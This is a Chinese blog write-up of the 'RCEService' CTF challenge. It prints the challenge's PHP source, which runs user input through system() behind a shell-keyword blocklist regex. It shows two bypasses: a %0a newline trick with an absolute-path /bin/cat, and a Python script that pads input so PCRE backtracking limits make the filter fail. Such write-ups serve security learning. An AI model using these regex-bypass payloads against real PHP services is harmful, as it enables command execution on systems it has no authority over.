首页后端开发其他后端知识RCEService正则回溯的相关题目和解答是什么

RCEService正则回溯的相关题目和解答是什么

时间2024-03-25 17:30:03发布访客分类其他后端知识浏览294
导读:这篇文章给大家介绍了“RCEService正则回溯的相关题目和解答是什么”的相关知识,讲解详细,步骤过程清晰,对大家进一步学习和理解“RCEService正则回溯的相关题目和解答是什么”有一定的帮助,希望大家阅读完这篇文章能有所收获。下面就...
这篇文章给大家介绍了“RCEService正则回溯的相关题目和解答是什么”的相关知识,讲解详细,步骤过程清晰,对大家进一步学习和理解“RCEService正则回溯的相关题目和解答是什么”有一定的帮助,希望大家阅读完这篇文章能有所收获。下面就请大家跟着小编的思路一起来学习一下吧。



打开题目输入JSON类型的cmd后,尝试读取index.php的源代码,但是读取不出来,并且扫后台出来的/index以及/index/login也没有任何东西,实在不知道怎么做了,只能看一下别人的wp,发现别人以来都是审查源码,我就奇怪了,源码怎么弄来的,看了很多wp发现应该是比赛的时候直接给的源码,但是buu平台忘记加上了


?php
putenv('PATH=/home/rceservice/jail');

if (isset($_REQUEST['cmd'])) {
    
    $json = $_REQUEST['cmd'];

    if (!is_string($json)) {
    
        echo 'Hacking attempt detectedbr/>
    br/>
    ';

    }
     elseif (preg_match('/^.*(alias|bg|bind|break|builtin|case|cd|command|compgen|complete|continue|declare|dirs|disown|echo|enable|eval|exec|exit|export|fc|fg|getopts|hash|help|history|if|jobs|kill|let|local|logout|popd|printf|pushd|pwd|read|readonly|return|set|shift|shopt|source|suspend|test|times|trap|type|typeset|ulimit|umask|unalias|unset|until|wait|while|[\x00-\x1FA-Z0-9!#-\/;
-@\[-`|~\x7F]+).*$/', $json)) {
    
        echo 'Hacking attempt detectedbr/>
    br/>
    ';

    }
 else {
    
        echo 'Attempting to run command:br/>
    ';
    
        $cmd = json_decode($json, true)['cmd'];

        if ($cmd !== NULL) {
    
            system($cmd);

        }
 else {
    
            echo 'Invalid input';

        }
    
        echo 'br/>
    br/>
    ';

    }

}
    
?>



看到最后的system以及正则,看来这题是要绕过正则执行cmd命令了,这么多黑名单函数应该不会让我们找漏网之鱼吧,不会吧不会吧


我们看到正则表达式没有添加修饰符,那我们可以利用多行匹配这个漏洞了




在这里我们可以利用%0a换行符进行绕过正则匹配,而且可以看到要有修饰符s才会让.*匹配换行符,因此我们这里可以利用我们之前的ls试试能不能成功




发现依然可以出来index.php;源代码中编译了环境变量path(我以为只是单纯暗示我们这个目录),我们就在那个目录下看看




发现了flag文件,我用nl,cat,more,less等命令都读取不出来 ,查资料发现,系统命令需要有特定的环境变量的也就是路径,系统找不到该路径下的exe文件怎么执行系统命令


因此这个地方查阅资料后发现只能调用绝对路径下的命令,cat命令就在/bin/目录下面




第二种办法也就是正则表达式回溯过多导致false,说实话我还是第一次听到正则的回溯问题


PHP利用PCRE回溯次数限制绕过某些安全限制


简单来说就是正则表达式匹配的时候某个.*将后面的字符全部匹配到了,导致表达式后面的式子没有地方匹配,因此一个一个字符吐出来,直到后面的式子全部匹配完毕或者回溯次数过多


例子






经过自己试试果然只能回溯一百万次



'/^.*



正则表达式最前面的匹配字符,^代表首个字母,'.'代表除换行符之外的所有字符,*代表前面那个表达式重复执行多次,因此他这里直接把我们的payload全部匹配完毕,导致后面的匹配不到字符了,只能一个个回溯




再将后面的匹配一下字符,可以发现目前写的小写字母都没有过滤掉,因为十六进制\x00-\x1f换算成十进制并没有到小写字母的ascii值那个地方,因此我们可以任意利用一个小写字母×个一百万次,就可以让正则表达式直接失败




import requests
url='http://5dd96313-13f8-4eb6-89eb-0dbb5a4ba30a.node3.buuoj.cn'
data={

    'cmd':'{
"cmd":"/bin/cat /home/rceservice/flag","feng":"'+'a'*1000000+'"}
'
}
    
r=requests.post(url=url,data=data).text
print(r)



    


以上就是关于RCEService正则回溯的相关题目和解答是什么的介绍,本文内容仅供参考,有需要的朋友可以借鉴了解看看,希望对大家学习或工作,想要了解更多欢迎关注网络,小编每天都会为大家更新不同的知识。

声明:本文内容由网友自发贡献,本站不承担相应法律责任。对本内容有异议或投诉,请联系2913721942#qq.com核实处理,我们将尽快回复您,谢谢合作!

					



若转载请注明出处: RCEService正则回溯的相关题目和解答是什么 


本文地址: https://pptw.com/jishu/652930.html
					

						什么是bootstrap?实现的媒体对象又是哪些?
						PHP通过ASCII将数值转字母的方法是什么?
					

				

				

					
				




	
	

		
		
		

		

			
 

			
 

					

		
游客 回复需填写必要信息